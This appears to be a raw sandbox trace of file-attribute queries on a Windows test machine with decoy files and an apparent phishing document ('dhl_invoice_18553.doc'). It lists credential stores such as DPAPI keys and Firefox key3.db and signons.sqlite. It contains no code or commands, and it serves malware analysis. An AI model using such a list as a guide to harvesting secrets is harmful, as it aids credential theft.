Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\Syscache.hve type = file_attributes True 1
Fn
Get Info C:\System Volume Information\Syscache.hve.LOG1 type = file_attributes True 1
Fn
Get Info C:\System Volume Information\tracking.log type = file_attributes True 1
Fn
Get Info C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752} type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\0ukmTstex9Yk.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\30E0eLqhb.swf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\6i3xIubH eO_Oc.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\6lymm.gif type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\73Aca1hJZj21f.gif type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\7LTXtVcQHG5Aps.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\aol-klYxxd-ebHs.pptx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\BaW5GK592jESNf.ots type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\bQT4GGF.swf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\bUDLiKwwdvlVu0Fp.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\EXMxNqbDyLogW3Q.doc type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\ft3B3GT-OT4iu6MHqp.png type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\gAVQdx.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\GxtbD6taQCKZ 44xYShn.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\il42fxfv-cHsuXeX.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\J83B PoqPbKO1K0.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\JOpH4qAgF.ots type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Jq6x.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\MSO1033.acl type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Database1.LNK type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\dhl_invoice_18553.LNK type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Global.LNK type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\index.dat type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\Outlook.srs type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\Outlook.xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\CREDHIST type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\1862f3be-4467-4925-a93f-badcfb2203ba type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\2ab03421-ab9c-4d63-8433-08c1054d525a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\8d3ed5bb-9674-4045-8be3-b9270b93e90b type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\e9d127d6-64ac-4353-96d2-c19aaf9f738b type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\Preferred type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\Preferred type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\SYNCHIST type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\Normal.dotm type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\~$Normal.dotm type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\MmKV-KMDDGO I9QNLG2.gif type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\m_nGah.bmp type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\N8kyOxBZYqA.pptx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\nxRTCA.png type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\pZhCOkJZpzNkmoN1.xls type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\QFjjDT.swf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\rkI K.ots type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Skype\RootTools\roottools.conf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\SmmEt-LdVr0Zx_Olc3.jpg type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\t77nCyK2D54L-.avi type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\TAUFKXR.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\vIAk3uQVE mqJmgqmrn.ods type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Vq88gNsu_kGKzVaZAN.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\wdCIUyDrDQiTXy79Virc.odt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\xG4x4HeiKjZ7Vc.png type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\XPHiF.mkv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\YdDv7baHmkIEK.odp type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\zx8we.wav type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\Aclviho ASldjfl.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\Administrator.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\asdlfk poopvy.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\chucu jadnvk.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\lulcit amkdfe.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Contacts\sikvnb huvuib.contact type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\3A80h.avi type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\4 1LtDyY FBJawFQ.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\4QM07F6yi6WlHQO.avi type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\4Y6Y7jsM.png type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6ht1YAcPawDjrvm.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\7WldkHXQxOVpDQNDW.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\awF3QaYYKE7JiHzZbi_.jpg type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\EMGs.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\jOCFd3U8H5x-sRV.png type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\Lg_E8OT886.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\QGDstYULo.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\6WhIjpj4XFj DHxr\RA2oHeB2ZaZIGBVr.mkv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\8PhOMHQyq Tz.gif type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\8srMDU-1UEo4QvDtImh.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\BERtbjZoGk-pmD-oM.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\bWy_MRp2om1.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\D2f1tj.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\dAKG0TLKDH61.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\dhl_invoice_18553.doc type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\eUfR3lQa.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\FktU4DvV6MVn2KxwF.pdf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\G8Tyx3zLajrPPMN.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\gkp2rD84ZW7zF1NxOV.avi type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\JShk.jpg type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\k6C2ik2VsqwNdkpBGLiQ.swf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\k7ArAafxQ3.jpg type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\lisuiJsd.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\lu9c.rtf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\MI006H9reLw-c1Mvt_.bmp type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\mQZl8_BRS-zJu.ots type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\nnEqLRC4CW2k0D4StTxD.csv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\o1QtvmgIu_5m-c.jpg type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\OKEnkR.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\pu66BoBBusrt_.ppt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\QBJ aWsjl5XuOmTR.odt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\rwwB_IyMvSFBdceY.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\TXWXJ1dTwCLcU6GYj.flv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\VIGUMaaKsm.m4a type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\xua-sokoX-vsS y6.swf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Desktop\~$l_invoice_18553.doc type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\-Gh8xVTHvKN.docx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\cEK7diml1yk6u.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\Database1.accdb type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\EpiSwZrXkY6iDl6--5.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\GfH8PzIxmf.doc type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\HtPTql011UKU.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\hZA-Nxcz-sO5.docx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\I8taZ.xls type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\Ieey.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\ImM0lH0iiw- Rdf3.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\k1KOs_f.docx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\MgrkE0wLUFsS9w.pptx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\mUX5K0uVoGwK.rtf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2 type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\Quick Notes.one type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\Outlook Files\sdjwh@dive.djh.pst type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\QXRvGRN2b-34jO0VFfJP.ppt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\SavSU.docx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\7 e5Hi.rtf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\DyZA.odp type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\3OWcZ.xls type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\3wyy3mPSQv_eyS.xls type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\9hgy.odt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\JvPde-zjB.ods type = file_attributes True 1
Fn
